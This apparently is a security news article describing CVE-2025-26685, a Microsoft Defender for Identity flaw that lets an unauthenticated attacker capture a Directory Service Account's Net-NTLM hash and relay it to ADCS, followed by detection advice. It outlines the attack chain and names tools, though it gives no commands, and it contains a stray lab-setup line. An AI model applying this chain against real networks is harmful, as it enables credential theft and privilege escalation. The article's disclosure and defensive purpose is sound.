A critical spoofing vulnerability in Microsoft Defender for Identity (MDI) that allows unauthenticated attackers to capture authentication credentials and potentially gain unauthorized access to Active Directory environments.
The vulnerability, tracked as CVE-2025-26685, exploits the Lateral Movement Paths feature to coerce the system into revealing the Net-NTLM hash of the Directory Service Account, creating a pathway for privilege escalation attacks.
NetSPI’s security research team identified a significant flaw in the Microsoft Defender for Identity sensor that fundamentally compromises the security of Active Directory environments.
The vulnerability stems from the MDI sensor’s implementation of Lateral Movement Paths (LMPs) feature, which is designed to help organizations identify potential attack paths within their networks by mapping administrative privileges across systems.
The vulnerability allows attackers with local network access to exploit the MDI sensor’s authentication mechanisms without requiring initial credentials.
When specific conditions are met, an unauthenticated attacker can trigger the MDI sensor to authenticate against their controlled system, resulting in the capture of the Directory Service Account’s Net-NTLM hash.
This hash can then be subjected to offline password cracking attempts or used in relay attacks to escalate privileges within the target environment.
Microsoft Defender Spoofing Vulnerability
The attack requires two critical conditions to be successful: the attacker’s system must have an associated DNS record, which commonly occurs automatically in Windows DHCP Server environments with Active Directory integration, and the attacker must initiate an anonymous connection to a Domain Controller that generates a specific Windows Event ID.
During the attack, cybercriminals can use tools like Impacket’s smbserver and rpcclient to establish an SMB Anonymous Null Session with the target Domain Controller.
This unauthenticated action triggers the MDI sensor to query the attacker’s system for Local Administrators group members as part of its LMP mapping process.
The authentication occurs via the SAM-R protocol, where Kerberos authentication can be downgraded to NTLM, exposing the Directory Service Account’s credentials.
The vulnerability becomes particularly dangerous when combined with other security vulnerability, such as Active Directory Certificate Services (ADCS) misconfigurations like ESC8.
On the Domain Controller, use the DNS Manager to create a new “Reverse Lookup Zone” for the subnet that the Attacker system is on:
Security Recommendations
Attackers can relay the captured authentication data to vulnerable certificate enrollment endpoints, ultimately obtaining Ticket Granting Tickets and NT hashes for the Directory Service Account, providing substantial access to Active Directory resources.
Organizations can implement several detection mechanisms to identify potential exploitation attempts.
Microsoft has acknowledged the vulnerability through their Security Response Committee, and organizations using Microsoft Defender for Identity should ensure their systems are updated with the latest security patches.
Security teams should monitor for authentication events originating from non-Domain Controller IP addresses for Directory Service Accounts, as these accounts should only authenticate from Domain Controllers via the MDI sensor.
Additional detection opportunities include monitoring LDAP requests containing specific certificate template enumeration queries and tracking certificate issuance events through Windows Event ID 4887.
Organizations should also watch for Kerberos TGT requests using certificate-based pre-authentication, indicated by Windows Event ID 4768 with pre-authentication type 16.
The Directory Service Account should be closely monitored through existing endpoint detection and response solutions for any anomalous activities that could indicate compromise.
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.
 that allows unauthenticated attackers to capture authentication credentials.){kind=link}